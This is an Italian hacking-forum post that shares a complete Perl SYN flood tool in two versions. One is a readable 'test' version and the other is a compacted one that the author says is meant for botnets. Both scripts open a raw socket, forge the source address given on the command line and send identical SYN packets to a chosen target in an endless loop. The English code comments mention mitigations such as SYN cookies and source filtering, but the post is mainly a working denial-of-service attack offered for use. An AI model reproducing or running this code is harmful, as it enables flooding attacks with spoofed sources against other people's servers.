HACKING 120% {Hacking, programmazione, computer & molto altro}

[Perl/Linux] SYN Flood

vogy
view post Posted on 15/8/2014, 16:02     +1   -1




ero un po' incasinato su come presentare il programma; in teoria andrebbe usato in botnet però così il codice fa schifo :O
Allora ho pensato di darlo nelle due versioni, 'normale' di prova e contratta da bot.
Ricordo che il SYN flood funziona malissimo sotto Windows (tutto il resto va bene, anche Mac) e *richiede privilegi di root* per la creazione di socket SOCK_RAW.

Pulita
CODICE
#!/usr/bin/perl -w

# Raw socket SYN flood

use strict;
use Socket;
use Getopt::Long;
# Script-level state: the two endpoints and the raw socket handle. These are
# package globals (`our`), and buildpacket() reads $s_host/$s_port/$t_host/$t_port
# directly from them rather than from its argument list.
our ($s_host, $s_port, $dest_host, $t_host, $t_port, $sock);

# With no arguments at all, show the usage text. usage() ends in die, so the
# script stops there.
my $input_data = $ARGV[0];
if(!defined $input_data) {
               usage();
}
# Parse the four endpoint options; if any is missing, usage() is called below.
GetOptions ('sh|source-host=s' => \$s_host,
           'sp|source-port=i' => \$s_port,
           'th|target-host=s' => \$dest_host,
           'tp|target-port=i' => \$t_port);
if(!defined $s_host or !defined $s_port or !defined $dest_host or !defined $t_port)
{
   usage();
}
# Resolve both names; element [4] of gethostbyname's return list is the first
# packed address. The source address comes from the command line, not from a
# local interface, so the packet claims whatever source the caller names.
# Networks that apply source-address (ingress/egress) filtering per BCP 38 drop
# such packets at the edge.
$s_host = (gethostbyname($s_host))[4];
$t_host = (gethostbyname($dest_host))[4];

# Raw IPv4 socket with protocol number 255 (IPPROTO_RAW); the IP header is
# supplied by the script itself (see buildpacket). The post states that creating
# this socket requires root privileges.
socket($sock , AF_INET, SOCK_RAW, 255) || die $!;
# The packet is built once; the same bytes are reused for every send below.
my($packet) = buildpacket($s_host, $s_port, $t_host, $t_port);
# http://perldoc.perl.org/functions/pack.html
# Hand-packed sockaddr_in: address family ('S'), port ('n'), 4-byte address
# ('a4'), 8 NUL padding bytes ('x8').
my($target) = pack('Sna4x8', AF_INET, $t_port, $t_host);

# Unbounded send loop with no delay and no counter: it ends only when send()
# fails (die) or the process is killed. On the receiving side this appears as a
# continuous stream of identical segments from one claimed source; SYN cookies
# (Linux: net.ipv4.tcp_syncookies) and per-source rate limiting are the usual
# server-side mitigations for this traffic pattern.
while (1) {
       send($sock , $packet , 0 , $target) || die "no socket send!\n";
       print "send socket...\n";
}

# Print the option summary and terminate.
# The first four lines go to STDOUT via print; the last line is emitted by die,
# so it goes to STDERR and the script exits with a failure status. usage()
# therefore never returns to its caller.
sub usage {
       print "\nUsage: $0 -sh|--source-host <host> -sp|--source-port <port> th|target-host <host> tp|target-port <port>\n\n";
       print "-sh|--source-host <host>    host sending syn-flood, choose any :-)\n";
       print "-sp|--source-port <port>    port (on source-host) sending syn-flood... choose any\n";
       print "-th|--target-host <host>    host to flood\n";
       die "-tp|--target-port <port>    port (on target-host) syn-flooded\n\n";
}

# Assemble one IPv4 + TCP packet as a byte string and return it.
# The arguments passed by the caller are not unpacked from @_; the body reads
# $s_host, $s_port, $t_host and $t_port from the enclosing package scope.
# Per the file's header comment the segment is intended as a TCP SYN.
#
# Apart from the endpoints, every field is a literal (sequence 13456,
# window 124, urgent pointer 44, IP id 19245, TTL 25), so for a given
# source/target pair every packet produced is byte-identical. That makes these
# constants a stable match for an IDS or firewall signature.
sub buildpacket {
       # reference: http://sock-raw.org/papers/sock_raw
       # First pass: TCP header with the checksum field set to 0.
       # Template fields in order: source port, destination port, sequence
       # number, acknowledgement number, data-offset byte ('H2'), flags byte
       # ('B8'), window, checksum ('v'), urgent pointer.
       my $temp_header = pack('nnNNH2B8nvn', $s_port, $t_port, 13456, 0, 50, 00000010, 124, 0, 44 );
       # Pseudo-header used only for checksumming: source address, destination
       # address, a zero byte, protocol 6 (TCP), TCP length; then the header.
       my $tcp_form = pack('a4a4CCn', $s_host, $t_host, 0, 6, length($temp_header) ) . $temp_header;

       my $checked_tcp = &checksum($tcp_form);

       # Second pass: the same TCP header with the computed checksum filled in.
       my $tcp_header = pack( 'nnNNH2B8nvn', $s_port, $t_port, 13456, 0, 50, 00000010, 124, $checked_tcp, 44 );
       # IP header fields in order: version/IHL byte ('H2'), type of service,
       # total length 40, identification, flags + fragment offset bits ('B16'),
       # TTL, protocol 6 (TCP), header checksum left at 0, source, destination.
       my $ip_header = pack('H2CnnB16CCna4a4', 45, 00, 40, 19245, "0100000000000000", 25, 6, 0, $s_host, $t_host);
       my $raw_packet = $ip_header.$tcp_header;
       return $raw_packet
}

sub checksum {
    # 16-bit one's-complement checksum over a byte string, after the routine
    # the original comment credits to W. Richard Stevens.
    # Takes the message as its only argument and returns an integer 0..0xffff.
    my ($msg) = @_;

    my $len_msg   = length($msg);
    my $num_short = $len_msg / 2;
    my $chk       = 0;

    # Add up the message as unsigned 16-bit words ('S' template).
    $chk += $_ for unpack("S$num_short", $msg);

    # Odd length: the final byte is added as well.
    if ($len_msg % 2) {
        $chk += unpack("C", substr($msg, $len_msg - 1, 1));
    }

    # Fold the carries into the low 16 bits, fold once more, then complement.
    $chk = ($chk & 0xffff) + ($chk >> 16);
    my $folded = ($chk >> 16) + $chk;

    return ~$folded & 0xffff;
}

Contratta:
CODICE
#!/usr/bin/perl
# Raw socket SYN flood
#usage: $0 <source host> <source port> <target host> <target port>
# Positional arguments only, with no validation: a missing argument reaches
# gethostbyname()/pack() as undef.
use strict;use Socket;our ($sock);
# Element [4] of gethostbyname's return list is the first packed address. The
# source address is whatever the caller passes, not a local interface address;
# source-address filtering (BCP 38) at the network edge drops such packets.
my $s_host=(gethostbyname($ARGV[0]))[4];my $s_port=$ARGV[1];
my $t_host=(gethostbyname($ARGV[2]))[4];my $t_port=$ARGV[3];
# Raw IPv4 socket, protocol number 255 (IPPROTO_RAW). The bare `die` carries no
# message, so a failure here reports only Perl's default "Died".
socket($sock ,AF_INET,SOCK_RAW,255) || die;
# Packet built once and reused for every send.
my($packet)=buildpacket($s_host,$s_port,$t_host,$t_port);
# Hand-packed sockaddr_in: family ('S'), port ('n'), address ('a4'), 8 pad bytes.
my($target)=pack('Sna4x8',AF_INET,$t_port,$t_host);
# Unbounded, silent send loop; it stops only when send() fails or the process is
# killed. SYN cookies (Linux: net.ipv4.tcp_syncookies) and per-source rate
# limiting are the usual server-side mitigations for this traffic pattern.
while (1) {send($sock ,$packet ,0 ,$target) || die;}
# Assemble one IPv4 + TCP packet as a byte string and return it.
# @_ is not unpacked; the body reads the file-scoped lexicals $s_host, $s_port,
# $t_host and $t_port declared above. All other fields are literals (sequence
# 13456, window 124, urgent pointer 44, IP id 19245, TTL 25), so packets for a
# given endpoint pair are byte-identical and can be matched by a fixed signature.
sub buildpacket {
# First pass: TCP header with the checksum field set to 0.
my $temp_header=pack('nnNNH2B8nvn',$s_port,$t_port,13456,0,50,00000010,124,0,44 );
# Pseudo-header (source, destination, zero, protocol 6, TCP length) + header.
my $tcp_form=pack('a4a4CCn',$s_host,$t_host,0,6,length($temp_header) ) . $temp_header;
my $checked_tcp=&checksum($tcp_form);
# Second pass: the same TCP header with the computed checksum filled in.
my $tcp_header=pack( 'nnNNH2B8nvn',$s_port,$t_port,13456,0,50,00000010,124,$checked_tcp,44 );
# IP header: total length 40, protocol 6 (TCP), header checksum left at 0.
my $ip_header=pack('H2CnnB16CCna4a4',45,00,40,19245,"0100000000000000",25,6,0,$s_host,$t_host);
my $raw_packet=$ip_header.$tcp_header;return $raw_packet }
sub checksum {
    # 16-bit one's-complement checksum of the byte string passed as the only
    # argument; returns an integer in the range 0..0xffff.
    my ($msg) = @_;
    my $len_msg   = length($msg);
    my $num_short = $len_msg / 2;

    # Sum the message as unsigned 16-bit words ('S' template).
    my $chk = 0;
    for my $word (unpack("S$num_short", $msg)) {
        $chk += $word;
    }

    # Odd length: add the final byte too.
    $chk += unpack("C", substr($msg, $len_msg - 1, 1)) if $len_msg % 2;

    # Fold carries into the low 16 bits, fold again, complement, mask.
    $chk = ($chk & 0xffff) + ($chk >> 16);
    my $folded = $chk + ($chk >> 16);
    return ~$folded & 0xffff;
}

P.S. È un bel sorcio (con link alle reference), Non Ci Fate Caxxate...
 